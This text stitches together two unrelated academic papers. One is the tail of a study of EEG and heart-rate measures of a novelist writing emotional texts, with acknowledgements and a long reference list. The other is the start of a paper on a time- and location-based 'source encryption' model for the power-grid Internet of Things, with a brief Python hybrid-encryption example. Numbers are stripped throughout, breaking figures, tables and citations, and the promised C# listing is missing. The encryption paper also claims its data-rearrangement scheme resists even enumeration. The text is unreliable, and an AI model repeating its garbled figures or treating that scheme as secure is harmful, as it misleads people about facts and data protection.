analysis may also benefit from a higher electrode density allowing to apply more advanced techniques for artifact removal van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.nyti.ms/ dgxkfr http://dx.doi.org/ . /peerj-cs. figure significant changes in subjective ratings over the course of a writing day. and eeg analysis. recent electrode developments may enable this without reducing usability and comfort over prolonged periods of use. 
although measuring physiology outside a well-controlled laboratory environment is challenging, the data show reliable differences between resting state and writing, which indicates a sufficient signal-to-noise ratio in the data. it could still be the case that this ‘‘writing detector’’ is triggered by artifacts like eye movements or muscle activity that comes with typing (however, the eeg channels most prone to these muscle artifacts (o , oz and o ) were removed from the dataset). if we look at the weight of the different features in the classification algorithm, we see that most weight is attributed to the delta ( – hz) and theta ( – ) bands in the frontal channels (fp , fpz, fp ). low frequency bands should be evaluated with caution as they may reflects eye movements rather than signals in the primary eeg. this is especially relevant for the current dataset since (eye movement) artifacts were non-stationary and could not be reliably identified and removed. however, the classifier is also based on suppression of alpha and increased central gamma activity during writing. this matches with the expected pattern for creative writing although one should note that gamma can also be affected by e.g., jaw clenching artifacts. in addition, the current differences in physiology like increased heartrate and decreased heartrate variability (see fig. ) do fit with an interpretation of low (rest) and high cognitive activity (writing) and not just with simple muscle activity. to exclude the aforementioned artifacts, a comparison should be made between writing about an emotion, writing down mundane instructions, and for instance copying text or making random typing movements. neurophysiology of emotional writing since there are no data available about neurophysiological correlates of emotional writing, we based our expectations on research into physiological responses based on presenting van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. many repetitions of, for instance, emotional pictures or sounds. in this domain, recent experiments show that changes in emotional state can also be reliably identified with a restricted number of repetitions or even single trial (especially for longer epochs like in our study). therefore, we expected to be able to see changes in physiological state as a function of emotional content, despite the limited number of repetitions. however, we were not able to link specific neurophysiological indices to the emotional content of the writing. we have three possible explanations: ( ) the quantity and/or quality of the data was not sufficient, ( ) writing is a cognitive rather than an emotional task for this particular author, and ( ) the task involved a multitude of emotional, creative and cognitive processes concealing the single-task indices found in single-task laboratory experiments. the first explanation pleads for expanding the data set using more authors and possibly more sessions than we were currently able to gather. nevertheless, we should keep in mind that the current data was sufficiently reliable to classify rest from writing with % accuracy, and the employed classifications methods are sensitive enough to be used on smaller datasets. this forces us to look into alternative explanations as well before upscaling. 
one such explanation is that for this particular writer, the writing process itself may predominantly be a cognitive task and unrelated to the emotional content, i.e., the writer does not experience a particular emotion himself when writing about it. the neurophysiological pattern found in writing compared to rest and the facial expression (often classified as neutral) fit with the signature of a cognitive task. based on the vast production of the writer and as confirmed in later discussion with him, this is a viable option. in hindsight, the time pressure ( min per item), the strict instruction (write about this particular emotion fitting with this particular picture), the time of day (always in the morning before the writing block started), and the presence of the experimenter may all have triggered cognitive controlled creativity rather than emotional or spontaneous creativity. the third factor that may have played a role in the current results is the task setting that may have resulted in multiple processes (including but not limited to emotional, associative, creative, linguistic and motor planning processes). the resulting brain activity patterns may not be comparable to those for passive viewing of emotional pictures in a laboratory environment. subjective ratings the ratings of arousal, happy, optimistic and flow seem to show the same pattern. at the start of the day, the writer is in a ‘relaxed, good mood’ but his mood seems to dwindle during the writing with increasing arousal. at the end of the day, after the last writing session, this pattern stabilizes or is reversed. this profile in part reflects the circadian modulation of mood and related aspects. the ebook of the future one may ask if uncovering brain states associated with art will de-mythologize the process: will art lose its meaning, beauty or purity when reduced to activity of groups of neurons? will we eventually reveal the mechanisms of art and thus render it mechanical? will scientists be able to develop a drug that makes everyone a best-selling author? will this knowledge increase the ‘creativity rat race’ for artistic and creative success as cognitive van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. enhancers may do in the ‘cognitive rat race’ in the academic world (repantis et al., )? we think not—but raising and discussing these questions is of utmost importance for the field (van erp, lotte & tangermann, ). a more interesting debate is whether creative writing is a skill one can develop like skilled behavior in sports and music, or possibly even non-creative writing like scientists and journalists do on a daily basis. creative skills are important outside the arts and the creative industry and their importance is widely acknowledged in an innovative and knowledge-based economy. we would like to expand our research into (spontaneous) creativity to answer important questions and develop appropriate tests and tools to measure spontaneous creativity (which may require h measurements). current ebooks have the ability to track reader behavior and ebook retailers are actively gathering (anonymous) data of their readers on parameters such as the books the reader has finished (or not), how fast, where reading was discontinued and for how long and which words were looked up in a connected dictionary (flood, ). none of this information is directly used for the benefit of the reader but serves manufacturers and publishers only. 
the basis for our approach is to measure the readers’ state and behavior to make them the primary beneficiaries, for instance through enhancing the reader experience. there are many approaches foreseeable. a relatively simple one that is not interactive yet is to use the emotional response to give better informed advice on other books the reader may enjoy. in a similar way, readers may want to share their emotional profile, for instance by posting it on social media or through new communities of people with similar frames of mind around a specific book. real interactivity may also come in many forms. for instance, the emotional response may be used to add music or other multisensory stimuli to further intensify the experience or ultimately change the storyline or the flow of the book. this may lead to new media products that are somewhere in between literature, movies and games. acknowledgements we kindly acknowledge the great help of christian vermorken and marc grootjen from eaglescience, andrew spink from noldus it, and leo hoogendoorn from tmsi for providing hardware and software components and helping us with the measurements and analyses. we sincerely thank arnon grunberg and his publishers elik lettinga and paulien loerts from nijgh & van ditmar for sharing their time and their creative minds. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • jan b.f. van erp conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • maarten a. hogervorst analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • ysbrand d. van der werf conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the institutional review board of tno human factors (tcpe soesterberg, the netherlands) approved this study. data availability the following information was supplied regarding data availability: this article describes the data of a single participant who is mentioned by name. to protect his privacy (including full address), the raw data will only be available to those signing a non-disclosure agreement with the first author’s institution (tno). please contact the corresponding author for more information. references arden r, chavez rs, grazioplene r, jung re. . neuroimaging creativity: a psycho- metric view. behavioural brain research ( ): – doi . /j.bbr. . . . bahramisharif a, van gerven m, heskes t, jensen o. . covert attention allows for continuous control of brain–computer interfaces. european journal of neuroscience ( ): – doi . /j. - . . .x. bal pm, veltkamp m. . how does fiction reading influence empathy? an ex- perimental investigation on the role of emotional transportation. plos one ( ):e doi . /journal.pone. . barrett lf, russell ja. . the structure of current affect: controversies and emerging consensus. 
current directions in psychological science ( ): – doi . / - . . bayer m, sommer w, schacht a. . reading emotional words within sentences: the impact of arousal and valence on event-related potentials. international journal of psychophysiology ( ): – doi . /j.ijpsycho. . . . berns gs, blaine k, prietula mj, pye be. . short- and long-term effects of a novel on connectivity in the brain. brain connectivity ( ): – doi . /brain. . . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.bbr. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / - . http://dx.doi.org/ . / - . http://dx.doi.org/ . /j.ijpsycho. . . http://dx.doi.org/ . /brain. . http://dx.doi.org/ . /brain. . http://dx.doi.org/ . /peerj-cs. berntson gg, bigger jt, eckberg dl, grossman p, kaufmann pg, malik m, nagaraja hn, porges sw, saul jp, stone ph, van der molen mw. . heart rate vari- ability: origins, methods, and interpretive caveats. psychophysiology ( ): – doi . /j. - . .tb .x. brouwer a-m, hogervorst ma, herman p, kooi f. . are you really looking? finding the answer through fixation patterns and eeg. in: lecture notes in artificial intelligence, vol. : proceedings of the th international conference on foundations of augmented cognition, – . brouwer a-m, hogervorst m, reuderink b, van der werf y, van erp jbf. . physiological signals distinguish between reading emotional and non-emotional sections in a novel. brain–computer interfaces ( – ): – doi . / x. . . brouwer a-m, zander to, van erp jbf, korteling h, bronkhorst aw. . using neurophysiological signals that reflect cognitive or affective state: six recommenda- tions to avoid common pitfalls. frontiers in neuroscience : doi . /fnins. . . carlsson i, wendt pe, risberg j. . on the neurobiology of creativity. differ- ences in frontal activity between high and low creative subjects. neuropsychologia ( ): – doi . /s - ( ) - . carreiras m, armstrong bc, perea m, frost r. . the what, when, where, and how of visual word recognition. trends in cognitive sciences ( ): – doi . /j.tics. . . . chávez-eakle ra, graff-guerrero a, garcía-reyna j-c, vaugier v, cruz-fuentes c. . cerebral blood flow associated with creative performance: a comparative study. neuroimage ( ): – doi . /j.neuroimage. . . . citron fmm. . neural correlates of written emotion word processing: a review of recent electrophysiological and hemodynamic neuroimaging studies. brain & language : – doi . /j.bandl. . . . colibazzi t, posner j, wang z, gorman d, gerber a, yu s, zhu h, kangarlu a, duan y, russell ja, peterson bs. . neural systems subserving valence and arousal during the experience of induced emotion. emotion : – doi . /a . dalgleish t. . the emotional brain. nature reviews neuroscience ( ): – . dehaene s, cohen l, morais j, kolinsky r. . illiterate to literate: behavioural and cerebral changes induced by reading acquisition. nature reviews neuroscience : – doi . /nrn . dietrich a. . the cognitive neuroscience of creativity. psychonomic bulletin and review ( ): – doi . /bf . dietrich a, kanso r. . a review of eeg, erp, and neuroimaging studies of creativity and insight. psychological bulletin ( ): – doi . /a . dockray s, steptoe a. . positive affect and psychobiological processes. neuroscience & biobehavioral reviews ( ): – doi . /j.neubiorev. . . . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / x. 
. http://dx.doi.org/ . /fnins. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.tics. . . http://dx.doi.org/ . /j.tics. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.bandl. . . http://dx.doi.org/ . /a http://dx.doi.org/ . /a http://dx.doi.org/ . /nrn http://dx.doi.org/ . /bf http://dx.doi.org/ . /a http://dx.doi.org/ . /j.neubiorev. . . http://dx.doi.org/ . /peerj-cs. ekman p. . are there basic emotions? psychological review ( ): – doi . / - x. . . . ellamil m, dobson c, beeman m, christoff k. . evaluative and generative modes of thought during the creative process. neuroimage ( ): – doi . /j.neuroimage. . . . erhard k, kessler f, neumann n, ortheil h-j, lotze m. . professional training in creative writing is associated with enhanced fronto-striatal activity in a literary text continuation task. neuroimage : – doi . /j.neuroimage. . . . fink a, benedek m. . eeg alpha power and creative ideation. neuroscience and biobehavioral reviews : – doi . /j.neubiorev. . . . fleureau j, guillotel p, orlac i. . affective benchmarking of movies based on the physiological responses of a real audience. in: proceedings— humaine association conference on affective computing and intelligent interaction, acii , art. no. , – . flood a. . ebooks can tell which novels you didn’t finish. in: the guardian: december , books section. available at http://www.theguardian.com/books/ / dec/ /kobo-survey-books-readers-finish-donna-tartt. fox na. . if it’s not left: it’s right electroencephalograph asymmetry and the development of emotion. american psychologist ( ): – doi . / - x. . . . fredrickson bl, tugade mm, waugh ce, larkin gr. . what good are positive emotions in crises? a prospective study of resilience and emotions following the terrorist attacks on the united states on september th, . journal of personality and social psychology ( ): – doi . / - . . . . friedman j, hastie t, tibshirani r. . regularization paths for generalized linear models via coordinate descent. journal of statistical software : – doi . /jss.v .i . golland y, keissar k, levit-binnun n. . studying the dynamics of autonomic activity during emotional experience. psychophysiology ( ): – doi . /psyp. . grunberg a. . merit. available at http://www.arnongrunberg.com/blog/ -merit. hasson u, landesman o, knappmeyer b, vallines i, rubin n, heeger dj. . neurocinematics: the neuroscience of film. projections ( ): – . herbert c, ethofer t, anders s, junghöfer m, wildgruber d, grodd w, kissler j. . amygdala activation during reading of emotional adjectives—an advan- tage for pleasant content. social cognitive and affective neuroscience : – doi . /scan/nsn . herbert c, junghofer m, kissler j. . event related potentials to emotional adjectives during reading. psychophysiology ( ): – doi . /j. - . . .x. he q, xue g, chen c, chen c, lu z-l, dong q. . decoding the neuroanatomical basis of reading ability: a multivoxel morphometric study. journal of neuroscience ( ): – doi . /jneurosci. - . . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.neubiorev. . . http://www.theguardian.com/books/ /dec/ /kobo-survey-books-readers-finish-donna-tartt http://www.theguardian.com/books/ /dec/ /kobo-survey-books-readers-finish-donna-tartt http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . / - . . . 
http://dx.doi.org/ . /jss.v .i http://dx.doi.org/ . /jss.v .i http://dx.doi.org/ . /psyp. http://dx.doi.org/ . /psyp. http://www.arnongrunberg.com/blog/ -merit http://dx.doi.org/ . /scan/nsn http://dx.doi.org/ . /scan/nsn http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /jneurosci. - . http://dx.doi.org/ . /peerj-cs. holt dj, lynn sk, kuperberg gr. . neurophysiological correlates of com- prehending emotional meaning in context. journal of cognitive neuroscience ( ): – doi . /jocn. . . hsu c-t, conrad m, jacobs am. . fiction feelings in harry potter: haemodynamic response in the mid-cingulate cortex correlates with immersive reading experience. neuroreport ( ): – doi . /wnr. . ishizu t, zeki s. . the brain’s specialized systems for aesthetic and perceptual judg- ment. european journal of neuroscience ( ): – doi . /ejn. . isotani t, lehmann d, pascual-marqui rd, fukushima m, saito n, yagyu t, ki- noshita t. . source localization of brain electric activity during positive, neutral and negative emotional states. international congress series : – doi . /s - ( ) - . johansen jd. . feelings in literature. integrative psychological and behavioral science ( ): – doi . /s - - - . johnson dr. . transportation into a story increases empathy, prosocial behavior, and perceptual bias toward fearful expressions. personality and individual differences ( ): – doi . /j.paid. . . . kawabata h, zeki s. . neural correlates of beauty. journal of neurophysiology ( ): – doi . /jn. . . kidd dc, castano e. . reading literary fiction improves theory of mind. science ( ): – doi . /science. . kissler j, assadollahi r, herbert c. . emotional and semantic networks in visual word processing: insights from erp studies. progress in brain research : – doi . /s - ( ) -x. klimesch w, sauseng p, hanslmayr s. . eeg alpha oscillations: the inhibition- timing hypothesis. brain research reviews : – doi . /j.brainresrev. . . . ko k-e, yang h-c, sim k-b. . emotion recognition using eeg signals with relative power values and bayesian network. international journal of control, automation and systems ( ): – doi . /s - - - . kreibig sd. . autonomic nervous system activity in emotion: a review. biological psychology ( ): – . kuchinke l, jacobs am, gubrich c, võ ml-h, conrad m, herrmann m. . incidental effects of emotional valence in single word processing: an fmri study. neuroimage : – doi . /j.neuroimage. . . . lang pj, bradley mm, cuthbert bn. . international affective picture system (iaps): affective ratings of pictures and instruction manual. technical report a- . gainesville: university of florida. lemm s, blankertz b, dickhaus t, müller kr. . introduction to machine learning for brain imaging. neuroimage ( ): – doi . /j.neuroimage. . . . leslie g, ojeda a, makeig s. . measuring musical engagement using expressive movement and eeg brain dynamics. psychomusicology: music, mind, and brain ( ): – doi . /pmu . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jocn. . http://dx.doi.org/ . /wnr. http://dx.doi.org/ . /ejn. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.paid. . . http://dx.doi.org/ . /jn. . http://dx.doi.org/ . /science. http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /j.brainresrev. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /pmu http://dx.doi.org/ . /peerj-cs. 
lewis pa, critchley hd, rotshtein p, dolan rj. . neural correlates of processing valence and arousal in affective words. cerebral cortex : – . lewis rs, weekes ny, wang th. . the effect of a naturalistic stressor on frontal eeg asymmetry, stress, and health. biological psychology ( ): – doi . /j.biopsycho. . . . limb cj, braun ar. . neural substrates of spontaneous musical performance: an fmri study of jazz improvisation. plos one ( ):e doi . /journal.pone. . liu s, chow hm, xu y, erkkinen mg, swett ke, eagle mw, rizik-baer da, braun ar. . neural correlates of lyrical improvisation: an fmri study of freestyle rap. scientific reports :article doi . /srep . lotze m, erhard k, neumann n, eickhoff sb, langner r. . neural correlates of verbal creativity: differences in resting-state functional connectivity associated with expertise in creative writing. frontiers in human neuroscience : . mar ra, oatley k, djikic m, mullin j. . emotion and narrative fiction: interactive influences before, during, and after reading. cognition and emotion ( ): – doi . / . . . mauss ib, robinson md. . measures of emotion: a review. cognition and emotion ( ): – doi . / . mayseless n, aharon-peretz j, shamay-tsoory s. . unleashing creativity: the role of left temporoparietal regions in evaluating and inhibiting the generation of creative ideas. neuropsychologia : – doi . /j.neuropsychologia. . . . mihov km, denzler m, förster j. . hemispheric specialization and creative thinking: a meta-analytic review of lateralization of creativity. brain and cognition ( ): – doi . /j.bandc. . . . min y-k, chung s-c, min b-c. . physiological evaluation on emotional change induced by imagination. applied psychophysiology biofeedback ( ): – doi . /s - - - . muehl c, van den broek e, brouwer a-m, nijboer f, van wouwe n, heylen d. . multi-modal affect induction for affective brain–computer interfaces. in: affective computing and intelligent interaction—lecture notes in computer science. vol. / . berlin heidelberg: springer, – . available at http://link.springer. com/chapter/ . % f - - - - _ . nijhof ad, willems rm. . simulatingfiction: individual differences in lit- erature comprehension revealed with fmri. plos one ( ):e doi . /journal.pone. . piffer d. . can creativity be measured? an attempt to clarify the notion of creativity and general directions for future research. thinking skills and creativity : – doi . /j.tsc. . . . posner j, russell ja, gerber a, gorman d, colibazzi t, yu s, wang z, kangarlu a, zhu h, peterson bs. . the neurophysiological bases of emotion: an fmri study of the affective circumplex using emotion-denoting words. human brain mapping : – doi . /hbm. . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.biopsycho. . . http://dx.doi.org/ . /j.biopsycho. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /srep http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.neuropsychologia. . . http://dx.doi.org/ . /j.bandc. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://link.springer.com/chapter/ . % f - - - - _ http://link.springer.com/chapter/ . % f - - - - _ http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.tsc. . . http://dx.doi.org/ . /j.tsc. . . http://dx.doi.org/ . /hbm. http://dx.doi.org/ . /peerj-cs. posner j, russell ja, peterson bs. . 
the circumplex model of affect: an integrative approach to affective neuroscience, cognitive development, and psychopathology. development and psychopathology ( ): – doi . /s . rellecke j, palazova m, sommer w, schacht a. . on the automaticity of emotion processing in words and faces: event-related brain potentials evidence from a superficial task. brain and cognition ( ): – doi . /j.bandc. . . . repantis d, schlattmann p, laisney o, heuser i. . modafinil and methylphenidate for neuroenhancement in healthy individuals: a systematic review. pharmacological research : – doi . /j.phrs. . . . reuderink b, mühl c, poel m. . valence, arousal and dominance in the eeg during game play. international journal of autonomous and adaptive communications systems ( ): – doi . /ijaacs. . . roth wt. . a comparison of p and the skin conductance response. in: gaillard awk, ritter w, eds. tutorials in erp research—endogenous components. amster- dam: north-holland, – . russell j. . a circumplex model of affect. journal of personality and social psychology : – doi . /h . russell ja, barrett lf. . core affect, prototypical emotional episodes, and other things called emotion: dissecting the elephant. journal of personality and social psychology ( ): – doi . / - . . . . russell ja, weiss a, mendelsohn ga. . affect grid: a single-item scale of plea- sure and arousal. journal of personality and social psychology ( ): – doi . / - . . . . schmidt la, trainor lj. . frontal brain electrical activity (eeg) distinguishes valence and intensity of musical emotions. cognition and emotion ( ): – doi . / . shah c, erhard k, ortheil h-j, kaza e, kessler c, lotze m. . neural correlates of creative writing: an fmri study. human brain mapping ( ): – doi . /hbm. . shamay-tsoory sg, adler n, aharon-peretz j, perry d, mayseless n. . the origins of originality: the neural bases of creative thinking and originality. neuropsychologia ( ): – doi . /j.neuropsychologia. . . . tomarken aj, davidson rj, wheeler re, doss rc. . individual differences in anterior brain asymmetry and fundamental dimensions of emotion. journal of personality and social psychology ( ): – doi . / - . . . . tovote p, fadok jp, luthi a. . neural circuits for fear and anxiety. nature reviews neuroscience ( ): – doi . /nrn . van der werf yd, van erp jbf. . monitoring the physiology of the creative process. in: spink aj, loijens lws, woloszynowska-fraser m, noldus lpjj, eds. proceedings of measuring behavior. wageningen: measuring behavior. van erp jbf, brouwer a-m, thurlings me, werkhoven pj. . framework for bcis in multimodal interaction and multitask environments. in: towards practical brain– computer interfaces. berlin heidelberg: springer, – . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s http://dx.doi.org/ . /j.bandc. . . http://dx.doi.org/ . /j.phrs. . . http://dx.doi.org/ . /ijaacs. . http://dx.doi.org/ . /h http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /hbm. http://dx.doi.org/ . /hbm. http://dx.doi.org/ . /j.neuropsychologia. . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /nrn http://dx.doi.org/ . /peerj-cs. van erp jbf, brouwer a-m, zander to. . editorial: using neurophysiological signals that reflect cognitive or affective state. frontiers in neuroscience : . van erp jbf, lotte f, tangermann m. . brain–computer interfaces: beyond medical applications. ieee computer ( ): – . 
van erp jbf, thurlings me, brouwer a-m, werkhoven pj. . bcis in multimodal interaction and multitask environments: theoretical issues and initial guidelines. in: universal access in human-computer interaction. users diversity. berlin heidelberg: springer, – . van gerven m, bahramisharif a, farquhar j, heskes t. . donders machine learning toolbox (dmlt) for matlab version / / . available at https://github. com/distrep/dmlt . verona e, sadeh n, curtin jj. . stress-induced asymmetric frontal brain ac- tivity and aggression risk. journal of abnormal psychology ( ): – doi . /a . walter h. . social cognitive neuroscience of empathy: concepts, circuits, and genes. emotion review ( ): – doi . / . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/distrep/dmlt https://github.com/distrep/dmlt http://dx.doi.org/ . /a http://dx.doi.org/ . /a http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - application of the source encryption algorithm model in the power industry jiao longbing shaanxi huabiao network technology co., ltd. xi’an, , china e-mail: james @ .com abstract—with the development of internet technology and internet of things technology, the internet of everything has become a hot topic, and in march , the national grid for the first time clarified the definition of the pan-in power internet of things, pointing out that the company's most urgent and important task is to accelerate the construction of the pan-in power internet of things. the security of data transfer on-line at any time is particularly important, in order to ensure the security of data, in the process of data transmission, data needs to be encrypted. this paper expounds a model of the information source data encryption algorithm, analyzes the encryption algorithm and the encryption method, and then provides a reference basis for the data transmission data security of power system. keywords-data communication; encryption algorithm model; encryption technology i. introduction driven by intelligence and informatization, ubiquitous electric internet of things is just at the right time. the construction of power internet of things puts forward higher requirements for data management and information management. at present, the state grid system is connected to more than million terminal devices, and with the construction of electric internet of things and the surge, there will be a huge amount of data. data is an important asset, data privacy protection, the construction of data security grading system, based on different security levels to determine the open rights of data, to ensure the efficiency of business execution and smooth management. internet of things technology is developing rapidly, but the corresponding infrastructure and security protection capabilities do not adapt to it. network security is the biggest hidden danger of the power internet of things. on the one hand, non-ip communication protocol is often used to transmit data in the internet of things, which lacks effective security measures. on the other hand, the increasingly intelligent and professional means of network attack have brought new problems to network security protection, leading to frequent network security incidents in the field of power grid in recent years. 
Therefore, strengthening the security risk control and management of the intelligent, information-driven power Internet of Things will be a key point of China's ubiquitous power Internet of Things construction. This paper focuses on a source encryption algorithm model, in the hope of providing a reference security model for digital business applications in the power industry.

II. Introduction to Encryption Technology

As an important part of network security, data encryption technology plays a very important role in the network. It involves the confidentiality, authentication, non-repudiation and integrity of data. The key is central to data encryption: it controls the implementation of the encryption and decryption algorithms. According to the kind of key used, encryption technology is divided into symmetric encryption, asymmetric encryption and hybrid encryption.

A. Symmetric encryption
Symmetric encryption means that the encryption key can be inferred from the decryption key and, conversely, the decryption key can be inferred from the encryption key. In most symmetric algorithms the encryption key and the decryption key are the same. For such algorithms the (secret) key usually has to be delivered by messenger or over a secret channel, so it is difficult to transmit and manage; the secret preservation of the key therefore determines the security of the algorithm. Typical representatives of symmetric-key encryption systems include DES, IDEA, chaos-based algorithms and the RC family of ciphers. Because both parties hold the same key, symmetric encryption is easy to implement and fast, so it is widely used to encrypt and decrypt data in communication and storage. The security of symmetric encryption depends on the key, so keeping the key secret is essential to the security of the communication. The symmetric encryption process is shown in the figure below.
Figure. Symmetric encryption flow chart

B. Asymmetric encryption
This technique is also called public-key cryptography. The encryption key (public key) can be made public, that is, it can be obtained by strangers and used to encrypt information, but the information can only be decrypted with the corresponding decryption key (private key). Compared with symmetric algorithms, asymmetric algorithms usually require two keys: a public key and a private key. When data is encrypted with one key of the pair it can only be decrypted with the other: data encrypted with the public key is decrypted with the private key, and data encrypted with the private key is decrypted with the public key. The advantage of public-key cryptography is that it can meet the open requirements of the network, but it is relatively slow and not well suited to encrypting large files. The asymmetric encryption process is shown in the figure below.
Figure. Asymmetric encryption flow chart

C. Hybrid encryption
Hybrid encryption is not a single encryption technique but a combination of the two techniques above. The communication process is divided into two parts: the parties first use asymmetric encryption to transmit the symmetric key to be used for the session, and then use symmetric encryption with that key to encrypt and transmit the file.
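To make the hybrid scheme concrete, the sketch below wraps a freshly generated symmetric key with RSA-OAEP and then encrypts the payload with that symmetric key. This is an illustrative example only, assuming the third-party Python `cryptography` package; it is not the source-encryption model proposed in this paper.

```python
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

OAEP = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# Receiver: publish an RSA public key, keep the private key.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

# Sender: generate a fresh symmetric key, wrap it with the receiver's public key,
# and encrypt the payload symmetrically with that key.
session_key = Fernet.generate_key()
wrapped_key = public_key.encrypt(session_key, OAEP)
ciphertext = Fernet(session_key).encrypt(b"power-grid telemetry record")

# Receiver: unwrap the symmetric key with the private key, then decrypt the payload.
recovered_key = private_key.decrypt(wrapped_key, OAEP)
plaintext = Fernet(recovered_key).decrypt(ciphertext)
assert plaintext == b"power-grid telemetry record"
```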
III. Temporal and Spatial Variables in the Source Encryption Model

A. Time variable definition
1) Year, month, day and hour variables
Table I. Time variable table (rows a–j, columns a–l; each cell combines a column letter with a row letter; the numeric codes are elided in the source):
row a: aa ba ca da ea fa ga ha ia ja ka la
row b: ab bb cb db eb fb gb hb ib jb kb lb
row c: ac bc cc dc ec fc gc hc ic jc kc lc
row d: ad bd cd dd ed fd gd hd id jd kd ld
row e: ae be ce de ee fe ge he ie je ke le
row f: af bf cf df ef ff gf hf if jf kf lf
row g: ag bg cg dg eg fg gg hg ig jg kg lg
row h: ah bh ch dh eh fh gh hh ih jh kh lh
row i: ai bi ci di ei fi gi hi ii ji ki li
row j: aj bj cj dj ej fj gj hj ij jj kj lj
The year, month, day and hour variables are added to the partial key format of the information source; as shown in the figure, their bit fields are combined to form a unique time variable. Year, month, day and hour cycle through the table and map to Gregorian calendar time.

2) Position variable
A position variable is assigned that maps the location of the source to latitude and longitude coordinates and serves as a key bit.
Table II. Location variables (3 × 3 grid):
southeast  south   southwest
east       center  west
northeast  north   northwest

3) Rearranging and encrypting the source data according to location, time and solar-term variables
The data format conversion of an encryption depends on a unique time point: the moment at which the data is encrypted determines that the conversion mode shown in the figure below is unique.
Figure. Data conversion mode
The starting time of the encryption fixes the data encryption variable, and the time variable forms the basis for the packet rotation changes. Once time and location are confirmed, the data is layered, each layer is divided into blocks, and each block is subdivided again in the same order; according to the law of time, each block and each page is then rotated, each page following its own rotation rule, until the smallest units are formed and every unit is given a block position number. After this sequence the format and order of the data are completely disrupted, and the unconventional ordering follows only the passage of time and the position rotation. After such rearrangement, data, pictures, videos and other files cannot be read even if they are intercepted: the key encryption variables of time, solar term and location cannot be obtained, and no useful key information can be recovered even by enumeration.

4) Law of rotation arrangement of the source data format
After the data is divided into pages, it is rotated and changed according to the hierarchy of layers; for example, the bottom layer uses the rotation mode, the third layer uses the 'feig' reordering, the second layer rotates according to the third layer, and the first layer rotates according to the second layer of rotation. In this way each data page is partitioned and rearranged. The quadratic subdivision is then carried out and the data blocks of the first part are redistributed into smaller blocks; after the third and fourth subdivisions the data is differentiated down to the smallest unit, the bit.
Figure. Rotation arrangement rule

5) Data decryption process model
Figure. Data decryption model
a) The sender rearranges the blocks and pages of the data format according to the time variable and the position marker bit, and the quadratic and cubic elements are segmented and arranged by the same method to form scattered random minimum-bit data.
b) Transfer process: the file is transmitted as the scattered random minimum-bit data, and the moment of transmission constitutes a time shift. After the time shift, the information received by the receiver has to be rearranged according to the change of the time variable, i.e., mapped through the time key.
c) Data receiver: the receiver obtains the scattered minimum-bit data. The receiver's key is derived from the sender's time and location variables together with the receiving time and location; using these, the smallest units are reverse-calculated into blocks according to their position labels, the blocks are pushed back into pages, and the pages are pushed back into the original data model. The record of this backward calculation is the decryption key.
The data encryption model above is established on a cubic-dimension secret calculation model, which can be used to split and switch top-secret data multiple times. In addition, it is applicable not only to ordinary data but also to audio and image data.

6) The programming language realizes the model construction idea of the encryption model
Data type definition. The original C# listing is reproduced below with its layout restored; numeric literals and several string values are elided in the source and are marked as such, and obviously garbled identifiers (e.g. "qi=m=data") have been normalized to the class name QMData.
